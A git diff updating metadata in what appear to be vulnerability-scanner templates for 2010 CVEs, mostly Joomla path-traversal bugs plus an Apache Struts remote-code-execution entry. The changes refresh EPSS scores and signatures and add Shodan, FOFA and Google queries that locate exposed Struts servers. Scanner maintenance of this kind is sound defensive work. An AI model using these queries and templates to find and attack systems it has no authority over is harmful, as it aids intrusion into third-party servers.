epss-percentile: 0.93322 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce9830af0a126d6aae7b0cbe9b7598011f30691e6f9066386c81c9fb4bf3c1bc022014f94fe6e238d285a780454bb05c33859277fe46440a3a38ce33dd5a9d376175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220494054249b8e4d7f93dbc0217e276a6b901834b92d67035bfbf8823272a12584022100cf4b2371066ea4cbcb01dcec2a5462226e0745a71aa82ef45e1702a49ee05d68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index a26d5378db..52679b2e54 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1473 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80104 + epss-percentile: 0.8192 cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100caea4647de08403d53042f0568175efd2710e43a5d7e4962fcdb653206899ef802204d6c39e2e96c51b1626db9d90b0417e114debda8ef2844386f4faaa68630e512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bb985e9373625d3f78d831ec8f0ea16e5f05271a6a438f282ef535e526d2be9022100f8466a6d8c383a398c2c891afeefdcd309f332a76e51078dc142e1982b239bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index ab3290bddd..b656913c78 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1474 - http://www.exploit-db.com/exploits/12182 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57662 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83996 + epss-percentile: 0.85468 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210092cb1f73ab7dcae152bc21fe109528bd68ddf3cb5c508c1c4ba81eb03a062e0f022100d32c234d25d1101db43416910efd4e3e67f536d43d1ed0a150d56605181bc34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eadc940751fa801f31bd9431865a1348c1f01b754fdecf114d6900e0bc46966a022100a8eef2e4dd1939224c45d659610ed1d33481c91c5055014673be55c6c96f3e44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index a257cd200a..322c4a4a22 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1475 - http://www.exploit-db.com/exploits/12147 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57652 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83996 + epss-percentile: 0.85468 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b79b632e011312d4f390807f69c5a574e87dd7c7f8e5645c0084a40ac2aaf84a0220638374eeade62a6c858f74603e82a9ff1c3f522a73e5268cfce3425a2bd72ae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205844fcb24ca826bfe720aa9c1f799ffcca234c2c4a537d6d4056f28e3425dd98022100af243d3db9445e19d89159b5af1a765b069d2b807e3e48c98cfb3b27424fd806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 0710e11ab6..dec4bc95c4 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90668 + epss-percentile: 0.91571 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e223bbab6d530ae6a44d3bd78a373853c5148f44c8fc760b86463968a99c39260220014aad890aabb37a243d84a97dc63c543133a8974a8c00e2b56a558e85a93be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220531dcb18e8f2b71dbb39f860cc4850ffd43574870cced6d1c14fa79a91dcc92b022100b113da3738595c7563a2e04bdecc3d3e47efe77caef58b89fd6e5f8a590a5fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 69adbf9bbd..78e7aee8ea 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1494 cwe-id: CWE-22 epss-score: 0.01827 - epss-percentile: 0.86946 + epss-percentile: 0.88212 cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078af0a2572ae5f8b2c1663f51eada15aaf88e88ddd86c86885239309dfc1cad3022004c0a80a0505a5b96aa016ae9b7c502555783290a05b5589d8a9677dcabefefe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220546ac5f56c9b94a44e941e632a9b307d80f472cc78e438065d385bcc5fec50c60221009b72878dc057fb94cdea625001bce4ecd0f230639b3f0a01e4fb43ac3892436e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 12ccceb83b..bc02bd8ff5 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1531 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.86892 + epss-percentile: 0.88163 cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e5477149f1e34b88e3dd7d962a23c967bc272e94ffeae18055a5a80d9e051cc602210086357c7ed36299ed6887410f4e2b5c11f76dc8fc2ad89d7197281be08c89e9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d153a797968de780071b765fc449d9036716aa8aabe6d3a20828a24643b592a7022100ca3ed2b9f6e724cf5b3833c1539d60175b10fc82b7dbf18e3ad5fa11d7fdb0c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index a3f6f5ad1f..c70c75a4af 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1532 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093ee4b75fd03b95c7cf1b62869f48b19b4cd257e9b6ee4e7a9ddd9ebdeba739f022100d1cd3032f304650a027ad4a1645ed98ff12691f89b7e9116d244291df5398606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205caacbaf2ced111a394d679ebcbfb86ab6f023380a04a9d6c7697916e3b76e43022056232dd3d5468b234d0d1cdaf03f2e753d6a0eadf807d281785b2f8c65dd7b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index a6e5e7208e..87d05d92fd 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.79951 + epss-percentile: 0.80337 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eedf4edbfe23d403bdd5c5489b678f09c60e2a4eb686e7fa5f90c08137b92d54022100e22396a012f39f1ae9f4950b22031a7521a366a61411f98a4f3323782f5e2eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207de073fa377307af9bd3d0b3406ad3f9681feb1ca46031ccfcb6ed7561fc4a940220077be57fecc58376b676559e9e3dae1c8c8a0868e3d9b9654d949e981ad93d8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 06afaa24fb..497cc14171 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01385 - epss-percentile: 0.86058 + epss-percentile: 0.86323 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040ad70967db9eabb2f9a61956bb22a2cb03a60da3fd695753b8fc46da9eb48e3022071b38622330ce4f8a704bb116b35a8279a76512268663ad681d5360a49288372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220627c0439bed5f9c857145fb35f1a5e4152607d796e171b2b35aab09be7387341022066442ae0a3a5ca34a7cc9658c5644f13efdf60281a3652b3a95f493277194bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index b1ef080b2e..665b8757a7 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -13,13 +13,14 @@ info: - https://www.exploit-db.com/exploits/12151 - https://nvd.nist.gov/vuln/detail/CVE-2010-1535 - http://www.exploit-db.com/exploits/12151 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78254 + epss-percentile: 0.80337 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081ae121f8d5b40c99be54953f4642587c68241fe48f2df08217c1a01ea61731502201393c0f1a4c9d6e00e2fd41022df88c7a15e3bc678a5eaf99634e69b735ab26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064230d9af661b0cb073113c4d0f724c89a82b08fcab9006563ef55a52a4825a40221009d1b17512cd61af4cc7e16ec02bb3451760585297295375e21604a3c784b1984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index faa548a7ba..a044a04067 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 - epss-percentile: 0.84437 + epss-percentile: 0.85844 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210097b2518e36f765bf1859fe172670ecd77886665cb539f4379bb250f6b6984e6a02207707d1856286f12c7923bf67ba75f1dcc7cc704a1603b96a498ca5e75ed2dbb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a5d4d3c01f9d5de6051deb8eb637e37c43ec48f37b679bea23ad125ef151d5a022031d19b5068b2be4e64980b85a51911c855eeedb0a1a916d75e0bfbcd8c1b94c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 82d4d0479b..ccbf3c44ed 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.91267 + epss-percentile: 0.91491 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e094a51db98044850affaa030835374e20660764cfd65e9a367c5012aa6741c02207e065ab9927fef891678a4c7c425734e4e0c1c040f73d6e9a60c9ab7b3b9bfd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0eeca7aba4d9618dbe8ca061a7589c36f2b6768e904f2b92e36691632e3cc0a022100bcb42d40cbb3d6a870475dd714f9ca84ad666d622dac96e9707a9253f85c0183:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 9866062708..ca49678242 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.91267 + epss-percentile: 0.91491 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022054c49fc7d9cd0665b02bdd1416c1510b1752a4f06b6591edf9975587dbd9f87102202a6ac32dc8f19d3831f4ecb72f8145c38a2992e9219593c3b2d5ad99f3f36663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b03cc1e6db4e62a042027fd52f75ce21fe57b02733b7c65eefba22966b2543ac022013e7947c1ed20184adbc8d931484553026dc0c8a63229e3974c3aace3c527502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index ba9f57adb0..0aa7d29812 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.01726 - epss-percentile: 0.87577 + epss-percentile: 0.87848 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220671ba5beac4877f63605810ae5ba53e80578909ca33547f5bbc443a22f1920b2022100c4437f0060e149ac837e691a2ee6a12613e7a6ebfe5da8f49b5b52643d78af5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a5567b36fff3d03faf770d2c865bf1b403a7b30e0032dfcb49e1553a84bbde4022100f26f6975831ceea1e81e0270b4d70b1ac8619c87910f88580b2df1a75323344c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 58f4abbb84..e7709b2dcc 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1653 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.91355 + epss-percentile: 0.91571 cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ad756a9e16380e027261fee411718753cfd8cbd153d923afa480c57a77e943d022100be3f9d60f33c780dec7263782e438f10d46f59b0c77a82743874dd0e9c03f65f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e7d67f69fd77bb7216c22fe8676faffb37290acbe3fd550615f33535360ee7102205db0d9e232af3096fb6bc570705058627696924b3e88bd65649940969e1ff061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 9a911b9473..8a50c2496a 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.87665 + epss-percentile: 0.87931 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bcb3752f3f8e24379ea159e6831ebe01f2da83a0d58232453372c79b86e08221022100ed629a46f18c172871595fe7120c9aeb0f2441da744b940c59461cde7c96719a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f7d70491dc51a14478a027cf92cee4704418b3b61a36897ba1a3f8ea33bea0df02207acc9a7bd2d035f2e228ed04cf180acadef6a88c222bf92e62cb4b1672822672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 19d33fcac3..04aec7c37b 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86853 + epss-percentile: 0.88135 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022044961916a557a8da30cac3ced56cc0b76c6ad56a135ccdeedda4e81e2bfea49e022027e20655fa3d414923eda4d6272299f0f4dd2cef72c8f74d3ba8b462a10c390a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0d75d2392e79829bfdf92b9806aaffe08721016c29f5e8f84e2cdfbfd700d12022100cdcc663f4843b1ee272e6c689afc5814092e36c1735e11ef0472b89bb472b7c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 91ec26c65c..f4d1851069 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -12,13 +12,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1715 - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/57677 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83996 + epss-percentile: 0.85468 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c47a4bdd67634653ce4da4af40c81205ffdcc542bbe4c92693d10063b0f15a6a02202182f5b7abe3de71edc4955d26840eeaaa624feab87fc896bee09c8bb5f97b8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9b34fe0a7da0582ef2dc9ed994e6f7c8805d5e3a7696068a29d89923a913df8022100869ef62055b34cb46a7e175e4df24c22713574e5763d263f77e84f873f33c6d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 709a568761..82e72f9219 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.81565 + epss-percentile: 0.8192 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ecd7446fef1ce54e4f4248ba012aa11ea08e53dd3f5a36fa12d01852d0bf6cd5022100d86f62c4cc116ef4a60241471d37ff8b72ad493ced0d7e6002f1c5ac3db35856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201dc083bb694abd37e88974641d425a4eaf4eff49cd1a761d702b381aaf4996200220164ea38314a22108dcab83b2524a8f02609d718d0f5541633d753c2dc66ea34c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 72fac83966..a8d48822f3 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.87378 + epss-percentile: 0.87631 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100efdd3798466d640e256d5a756ee7b624ed3eb6e4e1eff2d6307ab2bac89b607c022057069d8f4c691f3e6f4948c0d8355e3f992e8ff17c66ed10eec31c3abe925c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e0f92e7e1c35d6f80777dfd955af6777db5ac457b8f53c4342ca66a8db9ff6302201d0c74a5c1b6941dd9c112ef0739d516ba4dae634906b569d7e8dcd9c97a7330:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index a0435899d9..dd684fe50d 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87487 + epss-percentile: 0.88678 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201f2f6d4b03887f91f05f31e90985ffe041fc19b52146f7a927b36a949b69b27502200af68b38786ac9d14967173b092a4efe378dbf324842eda5736934450c559c42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052aabf3c818f63799605eb33167aa840fee9339e6f7a84c0684ed30ea8d352e9022100a66fb820f305c1ebef927eecccd45ce4ad7538e3550cbb860a0e6529cbc86ae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 64875ad48b..84558be2da 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -27,6 +27,15 @@ info: max-request: 2 vendor: apache product: struts + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache http: @@ -42,4 +51,4 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# digest: 4a0a00473045022009c28af24d49d9f2b2cd719eef0eab59eb17456cc5d44bc1d3fc2767d24ef9c4022100be33c84b0809ba11233918e74323b720e874f8870e0a84637e4a6b55f773050f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220011167dfff94820a6627ef47c2dc8c4e762e0a9a665ed00189fe142b7ad351f202207cc948bfc45395da792c6c5bd5e4c9cbf860f293155925e9e063de56ef236028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index c0a0bcad10..67832fdc7c 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1875 - http://www.exploit-db.com/exploits/11851 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57110 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83839 + epss-percentile: 0.85327 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201680f40e20b2858e86788424a8a44bc6958af8559d3f80c705f1af1c7035951c0221009efb7b9e0216197bd0463ed5285897d4212bdd853eab1b1e11ac3a3ef59792b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7924052921ccd115c3e7f4b89b1d61ef082cb6e9cd7711eb66d7691a2d7cfe7022100ca66094ffe917a58618599af1d573c56619f1a976252054f12604523672789e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index bf0c409599..11d0582f50 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.85196 + epss-percentile: 0.85468 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022061129aea74772e6b2b1371d4e9ba2aa09c9f71d86f09cf33e41a27be90867130022100d2644c5fc639b09a774b82d50f93ec5ca8f39406463ee51c885db6833b1deb61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e07e1103f68db3c4d774c16b7c2b4fc90547e70e1a8a8a752e6308c0465fc15302202e39e604eb2d895d4825c9de4334dd75c03176b3cdf972c69e7e55e9487083ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 1aa77d90cf..3bee6f3579 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1953 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.93171 + epss-percentile: 0.93322 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022038e7b2689d93babc89559d2862b8bc5b183cad389c6e2fed0700cefd3cf3dfdd022100fd31164f65dbbcb7da90ab8bfdc92b82e66296933e903952cbca8a4182cc9e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d737f13ca5fc25fe5a00569e47bc39dc8c74c5eb793170039da9d8ddd6470d2f022022d723da6b42ee3de6826045e52db5c95f4d96e596eddfbb0eb73dc0b4bca78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 7bcf1b5fd8..5c7b96d25e 100644 --- 